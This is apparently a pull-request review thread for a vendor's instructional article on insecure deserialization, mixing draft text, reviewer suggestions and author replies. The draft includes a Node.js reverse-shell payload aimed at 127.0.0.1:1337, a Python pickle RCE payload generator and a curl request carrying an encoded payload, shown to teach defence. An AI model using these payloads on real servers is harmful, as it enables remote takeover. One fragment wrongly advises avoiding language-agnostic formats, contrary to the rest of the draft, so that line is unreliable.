Added Insecure Deserialisation Instructional Article (#204)
cobalthq/cobalt-product-public-docs: content/en/BestPractices/Insecure_Deserialization.md

```
{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"1337\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') { 
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}
```

Base64 encoding the above payload and putting it as the cookie value of the request will create a reverse shell to `127.0.0.1` on port `1337`.

> ## Python3
> The most common use of deserialization in python is via the `pickle.loads()` function. Consider the following server code:

Reviewer: ```suggestion
## Python

The most common use of deserialization in python is via the `pickle.loads()` function. Consider the following server code:
```

        except Exception as e:
            return jsonify({'Hi': 'Stranger'})

if __name__ == '__main__':
    app.run()

```

The server behaves similarly to the NodeJS example. It listens on port 5000 and when a POST request is made to the endpoint, it tries to decode and deserialize the data in order to extract a username from it. In case of any errors, it responds back with a generic message otherwise replies with the name of the user. 

Again, the serialized data is read directly from the request body without any checks. Therefore, it can be exploited easily to gain Remote code execution by generating payloads with the following script:

```python
import pickle
import base64
import os

RCE_CMD = 'touch /tmp/PoC'

class RCE:
    def __reduce__(self):
        cmd = (RCE_CMD)
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
```

The resulting output would be a payload, which when sent in the POST body would execute the respective command on the system. For example, the following payload executes the command `touch /tmp/PoC` on the server:

```bash

> $ curl -X POST http://127.0.0.1:5000/ -d "{'payload': 'gASVKQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjA50b3VjaCAvdG1wL1BvQ5SFlFKULg=='}"

Author: Hi @mjang-cobalt, can you elaborate on this? I am not sure what does `non-identifying` payload actually mean?

> $ curl -X POST http://127.0.0.1:5000/ -d "{'payload': 'gASVKQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjA50b3VjaCAvdG1wL1BvQ5SFlFKULg=='}"

Reviewer: Your payload looks like an API token. I don't want to even suggest that we're using such identifying information.

```suggestion
$ curl -X POST http://127.0.0.1:5000/ -d "{'payload': '<substitute your payload>'}"
```

Native deserialization is insecure. It's best to use of language-agnostic methods for deserialization, such as JSON, XML, or YAML.

Even these libraries can be susceptible to vulnerabilities. For more information, see:

- [CVE-2020-1747](https://nvd.nist.gov/vuln/detail/cve-2020-1747): Vulnerability in the PyYAML library in versions before 5.3.1

- [CVE-2017-5941](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5941): Vulnerability in node-serialize package 0.0.4

## Impact of Insecure Deserialization

Insecure deserialization can lead to:
- Object Injection
- Denial of Service
- Tampering of Application Logic by Changing Control Flow
- Remote Code Execution

## What Causes Insecure Deserialization

You may see Insecure Deserialization with external or user-controlled data flows. While you could add checks for user-input, it is difficult address all use cases.

We recommend that you avoid language-agnostic methods for deserialization. In most cases, the libraries used have underlying vulnerabilities and incomplete bug fixes.

You should not deserialize user-controlled data because it can lead to the vulnerabilities listed above.

## Attack Scenarios

> You may see deserialization in Machine Learning. Review the following examples of related vulnerabilities:
> 
> - [Arbitrary code execution via Insecure YAML deserialization in Nvidia runx](https://huntr.dev/bounties/1-pypi-runx/)
> 
> - [Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)](https://hackerone.com/reports/1174185)
> 
> We share other vulnerabilities for web applications:
> 
> - [Bitbucket Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2022-26133](https://jira.atlassian.com/browse/BSERV-13173)
> 
> - [Confluence Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2016-10750](https://jira.atlassian.com/browse/BSERV-13173)
> 
> We present more scenarios related to insecure deserialization in web applications:
> 
> - Direct deserialization of user-controlled data. Example: CVE-2019-10068
> 
> - Native vulnerabilities in libraries. Example: CVE-2020-1747
> 
> - Improper deserialization of language agnostic methods like XML and JSON data. Example: CVE-2017-9805

Reviewer: Removing extra lines. Adding links to CVEs

```suggestion
You may see deserialization in Machine Learning. Review the following examples of related vulnerabilities:

- [Arbitrary code execution via Insecure YAML deserialization in Nvidia runx](https://huntr.dev/bounties/1-pypi-runx/)
- [Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)](https://hackerone.com/reports/1174185)

We share other vulnerabilities for web applications:

- [Bitbucket Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2022-26133](https://jira.atlassian.com/browse/BSERV-13173)
- [Confluence Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2016-10750](https://jira.atlassian.com/browse/BSERV-13173)

We present more scenarios related to insecure deserialization in web applications:

- Direct deserialization of user-controlled data. Example: [CVE-2019-10068](https://nvd.nist.gov/vuln/detail/cve-2019-10068)
- Native vulnerabilities in libraries. Example: [CVE-2020-1747](https://nvd.nist.gov/vuln/detail/cve-2020-1747)
- Improper deserialization of language agnostic methods like XML and JSON data. Example: [CVE-2017-9805](https://nvd.nist.gov/vuln/detail/cve-2017-9805)
```

			token = cPickle.loads(base64.b64decode(headers['AuthToken']))  # User control data flows into insecure cPickle.loads() function
			if not check_hmac(token['signature'], token['data'], getSecretKey()):  
				raise AuthFail  
			self.secure_data = token['data']  
		except:  
			raise AuthFail
```

In the above example, data from request headers flow directly into the deserialization function, making it vulnerable. 

-   Run untrusted deserialization function inside a sandbox. For example, you can use [nsjail](https://github.com/google/nsjail).
-   Use deserialization methods like JSON, XML, and YAML that are language-agnostic.
-   Use updated libraries, to avoid known security bugs.
-   Limit and check all incoming and outgoing network activity from deserialization containers and servers.

If you're a Java developer, you may need to implement the `serializable` interface due to inheritance. You can override the `readObject()` to prevent actual deserialization. Take the following example from [Snyk](https://snyk.io/)::

```java
private final void readObject(ObjectInputStream in) throws java.io.IOException { 
	throw new java.io.IOException("Deserialized not allowed"); 
}
```

> - If you're using PHP, you may need to pass serialized data to the user. In that case, don't use the `unserialize()` function. Use a safe standard data interchange format such as `JSON` (via `json_decode()` and `json_encode()`).

Reviewer: Do you have any reference information? 

You'll see in our other [Best Practices](https://developer.cobalt.io/bestpractices/) articles, others have provided appropriate references. I'd start with the relevant OWASP 2021 Top 10 entry.

Author: Hi @mjang-cobalt, as always, thanks for the feedback. I have made the changes, added the references and so on. I will be waiting for your feedback. Thank you for all the help and feedback 😀

  

- However, even these libraries can be susceptible to vulnerabilities. For example, CVE-2020-1747, CVE-2020-14343, etc.

  

  

  

## Impact of Insecure Deserialization

  

  

Insecure deserialization can lead to:

  

  

- Object Injection

  

- Denial of Service

  

- Tampering of Application Logic

  

- ***Remote Code Execution*, etc**

  

  

  

## Cause of Insecure Deserialization

  

  

- Insecure Deserialization occurs when external or user-controlled data flows into deserialization functions.

  

- Putting checks for user-input data is seldom useful as it is extremely hard to come up with checks for all possible cases.

  

- In the case of using language-agnostic methods for deserialization, in most cases, the libraries used themselves have underlying vulnerabilities and incomplete bug fixes. 

  

- Ideally, no user-controlled data should be deserialized.

  

  

# Some interesting attack scenarios

  

  

The most common use of deserialization is in Machine Learning. Some examples of related vulnerabilities are:

>   
> 
>   
> 
> - [Arbitrary code execution via Insecure YAML deserialization in Nvidia runx](https://huntr.dev/bounties/1-pypi-runx/)
> 
>   
> 
> - [Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)](https://hackerone.com/reports/1174185)
> 
>   
> 
>   
> 
>   
> 
> For web applications, some interesting vulnerabilities are:
> 
>   
> 
>   
> 
> - [Bitbucket Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2022-26133](https://jira.atlassian.com/browse/BSERV-13173)
> 
>   
> 
> - [Confluence Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2016-10750](https://jira.atlassian.com/browse/BSERV-13173)
> 
>   
> 
>   
> 
>   
> 
> A non-exhaustive list of attack scenarios and vulnerabilities that can arise out of insecure deserialization, especially concerning web applications, are as follows:
> 
>   
> 
>   
> 
> - Direct deserialization of user-controlled data. Example: CVE-2019-10068
> 
>   
> 
> - Native vulnerabilities in libraries. Example: CVE-2020-1747 
> 
>   
> 
> - Improper deserialization of language agnostic methods like XML and JSON data. Example: CVE-2017-9805
> 
>   
> 
>   
> 
> In some cases, serialized data is also used to implement authorization and authentication. Consider the following snippet taken from [MITRE](https://cwe.mitre.org/data/definitions/502.html):
> 
>   
> 
>   
> 

Reviewer: Please describe and include links to all CVEs

```suggestion
## Attack Scenarios

You may see deserialization is in Machine Learning. Review the following examples of related vulnerabilities:

- [Arbitrary code execution via Insecure YAML deserialization in Nvidia runx](https://huntr.dev/bounties/1-pypi-runx/)
- [Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)](https://hackerone.com/reports/1174185)

We share other vulnerabilities for web applications:

- [Bitbucket Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2022-26133](https://jira.atlassian.com/browse/BSERV-13173)
- [Confluence Data Center - Java Deserialization Vulnerability In Hazelcast - CVE-2016-10750](https://jira.atlassian.com/browse/BSERV-13173)
- Direct deserialization of user-controlled data. Example: CVE-2019-10068
- Native vulnerabilities in libraries. Example: CVE-2020-1747 
- Improper deserialization of language agnostic methods like XML and JSON data. Example: CVE-2017-9805

In some cases, you can serialize data ito implement authorization and authentication. Consider the following code snippet from [MITRE](https://cwe.mitre.org/data/definitions/502.html):

```

```python
class ExampleProtocol(protocol.Protocol):  
	def dataReceived(self, data):    
		# Code that would be here would parse the incoming data  
		# After receiving headers, call confirmAuth() to authenticate  

	def confirmAuth(self, headers):  
		try:  
			token = cPickle.loads(base64.b64decode(headers['AuthToken']))  
			if not check_hmac(token['signature'], token['data'], getSecretKey()):  
				raise AuthFail  
			self.secure_data = token['data']  
		except:  
			raise AuthFail

```

> 
>   
> 
> Under the given scenario, serialized data is used to authorize a user. Any errors or discrepancies raise an `AuthFail` exception. However, n attacker can use a Base64 encoded deserialization payload that would be triggered whenever the `AuthToken` token header is parsed.
> 
>   
> 
>   
> 
> # Vulnerable Code Snippets

Reviewer: Also -- we need more info -- what lines in the code snippet are vulnerable?

```suggestion

In this scenario, serialized data authorizes a user. Errors or discrepancies raise an `AuthFail` exception. However, an attacker can use a Base64 encoded deserialization payload to that's triggered when an app parses the `AuthToken` token header.

## Vulnerable Code Snippets

```

sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}
```

Base64 encoding the above payload and putting it as the cookie value of the request will create a reverse shell to `127.0.0.1` on port `1337`.

## Python3
The most common use of deserialization in python is via the `pickle.loads()` function. Consider the following server code:
```python
import pickle
import binascii
from base64 import urlsafe_b64decode
from flask import Flask
from flask import request, jsonify

app = Flask(__name__)

@app.route('/', methods = ['GET', 'POST'])
def user():
    if request.method == 'GET':
        return jsonify({"message":"Hello World!"})

        
    if request.method == 'POST':
        try:
            data = request.form 
            decoded = urlsafe_b64decode(data['payload'])
            username = pickle.loads(decoded) #vulnerable deserialization
            return jsonify({'Hi':username})

        except Exception as e:
            return jsonify({'Hi': 'Stranger'})

if __name__ == '__main__':
    app.run()

```

> The server behaves similarly to the NodeJS example. It listens on port 5000 and when a POST request is made to the endpoint, it tries to decode and deserialize the data in order to extract a username from it. In case of any errors, it responds back with a generic message otherwise replies with the name of the user. 
> 
> Again, the serialized data is read directly from the request body without any checks. Therefore, it can be exploited easily to gain Remote code execution by generating payloads with the following script:

Reviewer: This is all under the `## NodeJS` section, so this still looks like the "NodeJS example". (I think you need to set up a separate section, so you could link back to it.)

I'm not sure what you mean by ` generic message otherwise replies with the name of the user. `
- Are you saying that a "generic message" is different from a response with the name of the user? If so, we need separate sentences with explanations
  - What's an example of a generic message
  - What's an example of a response with the name of the user?

```suggestion
The server behaves in a similar fashion to the NodeJS example. It listens on port 5000. When a POST request is made to the endpoint, the server tries to decode and deserialize the data to extract a username.
If there are errors, the server responds with a generic message otherwise replies with the name of the user. 

Again, the serialized data is read directly from the request body without any checks. Therefore, it can be exploited easily to gain Remote code execution by generating payloads with the following script:
```

> ```python
> ```python

Reviewer: I'm guessing this is a duplicate line

````suggestion
```python
````

import pickle
import base64
import os

RCE_CMD = 'sleep 10'

class RCE:
    def __reduce__(self):
        cmd = (RCE_CMD)
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
```

> The resulting output would be a payload, which when sent in the POST body would execute the respective command on the system.

Reviewer: - Can you include an example of the payload? 
- Can you specify the "respective command"?

I'd also revise this line:

```suggestion
The output, when sent in the POST, executes the <something> command on the system.
```

> # Mitigations
> 
> - Never directly deserialize any user-controlled or untrusted data. For example, take the original code snippet:  

Reviewer: "Mitigations" suggest that you have more than one solution. I see only one solution in your draft.

```suggestion
## Solution

Do not directly deserialize any user-controlled or untrusted data. For example, take the original code snippet:  
```

```python
class ExampleProtocol(protocol.Protocol):  
	def dataReceived(self, data):    
		# Code that would be here would parse the incoming data  
		# After receiving headers, call confirmAuth() to authenticate  

	def confirmAuth(self, headers):  
		try:  
			token = cPickle.loads(base64.b64decode(headers['AuthToken']))  
			if not check_hmac(token['signature'], token['data'], getSecretKey()):  
				raise AuthFail  
			self.secure_data = token['data']  
		except:  
			raise AuthFail
```

>  In the above example, data from request headers flow directly into the deserialization function, making it vulnerable. 
> 
> -   Run untrusted deserialization function inside a sandbox. One such sandbox that developers can use is [nsjail](https://github.com/google/nsjail).
> -   Use deserialization methods like JSON, XML, and YAML that are language-agnostic.
> -   Use only updated libraries to ensure that any known security bugs are patched. For example, PyYaml version 5.4 is known to be vulnerable to CVE-2020-14343 but was fixed in subsequent versions.
> -   Limit and check all incoming and outgoing network activity from deserialization containers and servers.
> -   In the case of Java applications, if you do need to implement the `serializable` interface due to inheritance, you can override the `readObject()` to prevent actual deserialization. Take the following example from [Snyk](https://snyk.io/):

Reviewer: How does this "indirectly deserialize any user-controlled or untrusted data"?
- Which line shows how data flows into the deserilization function?
- How do you "limit and check" all incoming and outgoing network activity?

```suggestion
 In the above example, data from request headers flow directly into the deserialization function, making it vulnerable. 

-   Run untrusted deserialization function inside a sandbox. For example, you can use [nsjail](https://github.com/google/nsjail).
-   Use deserialization methods like JSON, XML, and YAML that are language-agnostic.
-   Use updated libraries, to avoid known security bugs.
-   Limit and check all incoming and outgoing network activity from deserialization containers and servers.

If you're a Java developer, you may need to implement the `serializable` interface due to inheritance. You can override the `readObject()` to prevent actual deserialization. Take the following example from [Snyk](https://snyk.io/):

```

```java
private final void readObject(ObjectInputStream in) throws java.io.IOException { 
	throw new java.io.IOException("Deserialized not allowed"); 
}
```

> - In the case of PHP applications, ue a safe, standard data interchange format such as `JSON` (via `json_decode()` and `json_encode()`) instead of `unserialize()` function, if you need to pass serialized data to the user.

Reviewer: ```suggestion

If you're using PHP, you may need to pass serialized data to the user. In that case, don't use the `unserialize()` function. Use a safe standard data interchange format such as `JSON` (via `json_decode()` and `json_encode()`).
```
